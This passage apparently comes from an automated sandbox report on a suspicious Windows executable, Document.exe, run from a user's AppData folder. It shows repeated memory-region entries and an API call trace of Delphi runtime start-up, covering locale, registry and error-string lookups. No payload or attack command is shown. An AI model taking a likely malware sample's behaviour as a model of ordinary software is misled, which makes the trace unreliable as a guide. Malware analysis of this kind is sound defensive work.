end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1816 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1817 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1818 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1819 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1820 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1821 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1822 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1823 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1824 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1825 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1826 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1827 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1828 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1829 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1830 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1831 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1832 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1833 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1834 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1835 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1836 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1837 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1838 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1839 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1840 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1841 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1842 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1843 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1844 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1845 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1846 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1847 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1848 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1849 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1850 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1851 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1852 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1853 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1854 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1855 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1856 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1857 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1858 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1859 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1860 start_va = 0x350000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 1861 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1862 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1863 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1864 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1865 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1866 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1867 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1868 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1869 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1870 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1871 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1872 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1873 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1874 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1875 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1876 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1877 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1878 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1879 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1880 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1881 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1882 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1883 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1884 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1885 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1886 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1887 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1888 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1889 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1890 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1891 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1892 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1893 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1894 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1895 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1896 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1897 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1898 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1899 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1900 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1901 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1902 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1903 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1904 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1905 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1906 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1907 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1908 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1909 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1910 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1911 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1912 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1913 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1914 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1915 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1916 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1917 start_va = 0x340000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Thread: id = 76 os_tid = 0x6c8 [0192.474] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.475] GetKeyboardType (nTypeFlag=0) returned 4 [0192.475] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\" 2 2616 18220554" [0192.475] GetStartupInfoA (in: lpStartupInfo=0x18fefc | out: lpStartupInfo=0x18fefc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0192.475] GetVersion () returned 0x1db10106 [0192.475] GetVersion () returned 0x1db10106 [0192.475] GetCurrentThreadId () returned 0x6c8 [0192.475] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f9f8, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0192.475] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f8d3, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0192.475] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0192.476] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0192.476] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0192.476] lstrcpynA (in: lpString1=0x18f8d3, lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", iMaxLength=261 | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" [0192.476] GetThreadLocale () returned 0x409 [0192.476] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18f9e3, cchData=5 | out: lpLCData="ENU") returned 4 [0192.480] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe") returned 55 [0192.480] lstrcpynA (in: lpString1=0x18f907, lpString2="ENU", iMaxLength=209 | out: lpString1="ENU") returned="ENU" [0192.480] LoadLibraryExA (lpLibFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0192.480] lstrcpynA (in: lpString1=0x18f907, lpString2="EN", iMaxLength=209 | out: lpString1="EN") returned="EN" [0192.480] LoadLibraryExA (lpLibFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0192.480] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0192.480] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x586388 [0192.481] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1da0000 [0192.481] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x587388 [0192.481] VirtualAlloc (lpAddress=0x1da0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1da0000 [0192.481] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0192.481] LoadStringA (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0192.481] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0192.481] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0192.481] LoadStringA (in: hInstance=0x400000, uID=0xffd8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0192.481] LoadStringA (in: hInstance=0x400000, uID=0xffef, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0192.481] LoadStringA (in: hInstance=0x400000, uID=0xffec, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0192.481] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0192.481] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0192.481] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0192.481] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0192.481] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0192.481] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0192.482] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0192.482] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0192.482] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0192.482] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0192.482] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0192.482] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0192.482] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0192.482] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0192.482] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0192.482] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0192.482] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0192.482] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0192.482] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0192.482] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0192.482] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0192.482] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0192.482] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0192.482] GetVersionExA (in: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0192.482] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76220000 [0192.482] GetProcAddress (hModule=0x76220000, lpProcName="GetDiskFreeSpaceExA") returned 0x762b434f [0192.482] GetThreadLocale () returned 0x409 [0192.483] GetThreadLocale () returned 0x409 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jan") returned 4 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd78, cchData=256 | out: lpLCData="January") returned 8 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Feb") returned 4 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd78, cchData=256 | out: lpLCData="February") returned 9 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mar") returned 4 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="March") returned 6 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Apr") returned 4 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="April") returned 6 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jun") returned 4 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="June") returned 5 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jul") returned 4 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="July") returned 5 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Aug") returned 4 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="August") returned 7 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sep") returned 4 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd78, cchData=256 | out: lpLCData="September") returned 10 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Oct") returned 4 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd78, cchData=256 | out: lpLCData="October") returned 8 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Nov") returned 4 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd78, cchData=256 | out: lpLCData="November") returned 9 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Dec") returned 4 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd78, cchData=256 | out: lpLCData="December") returned 9 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sun") returned 4 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sunday") returned 7 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mon") returned 4 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Monday") returned 7 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tue") returned 4 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tuesday") returned 8 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wed") returned 4 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wednesday") returned 10 [0192.483] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thu") returned 4 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thursday") returned 9 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Fri") returned 4 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Friday") returned 7 [0192.484] GetLocaleInfoA (in: 